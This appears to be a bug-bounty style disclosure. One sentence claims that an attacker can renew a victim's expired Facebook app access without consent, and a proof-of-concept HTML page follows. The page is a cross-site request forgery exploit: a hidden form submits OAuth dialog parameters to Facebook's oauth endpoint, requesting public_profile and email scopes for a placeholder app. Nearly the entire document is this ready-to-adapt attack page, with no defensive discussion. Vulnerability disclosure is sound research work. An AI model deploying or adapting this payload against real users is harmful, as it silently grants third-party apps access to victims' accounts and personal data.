It was possible for an attacker to renew access to Apps
which have expired for the victim without the victim's consent.POC -
=========================================================================
=========================================================================
<html>
<!-- POC-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.facebook.com/v2.3/dialog/oauth">
<input type="hidden" name="app_id" value="APP_ID" />
<input type="hidden" name="auth_type" value="" />
<input type="hidden" name="cbt" value="1622970398155" />
<input type="hidden" name="channel_url" value="https://staticxx.facebook.com/x/connect/xd_arbiter/?version=46#cb=f11c70b8d77d13&domain=www.APP_CALLBACK_DOMAIN.com&origin=https%3A%2F%2Fwww.APP_CALLBACK_DOMAIN.com%2Ff1e7baa12b0f5a4&relation=opener" />
<input type="hidden" name="client_id" value="APP_ID" />
<input type="hidden" name="display" value="popup" />
<input type="hidden" name="domain" value="www.APP_CALLBACK_DOMAIN.com" />
<input type="hidden" name="e2e" value="{}" />
<input type="hidden" name="fallback_redirect_uri" value="https://www.APP_CALLBACK_DOMAIN.com/signup?redirect=/" />
<input type="hidden" name="fx_app" value="facebook" />
<input type="hidden" name="locale" value="en_US" />
<input type="hidden" name="logger_id" value="f256cfb96281ce4" />
<input type="hidden" name="origin" value="1" />
<input type="hidden" name="redirect_uri" value="https://staticxx.facebook.com/x/connect/xd_arbiter/?version=46#cb=f232d7fd018cdac&domain=www.APP_CALLBACK_DOMAIN.com&origin=https%3A%2F%2Fwww.APP_CALLBACK_DOMAIN.com%2Ff1e7baa12b0f5a4&relation=opener&frame=f3505dbd2db68" />
<input type="hidden" name="response_type" value="token,signed_request,graph_domain" />
<input type="hidden" name="return_scopes" value="false" />
<input type="hidden" name="scope" value="public_profile,email" />
<input type="hidden" name="sdk" value="joey" />
<input type="hidden" name="version" value="v2.3" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
=========================================================================
=========================================================================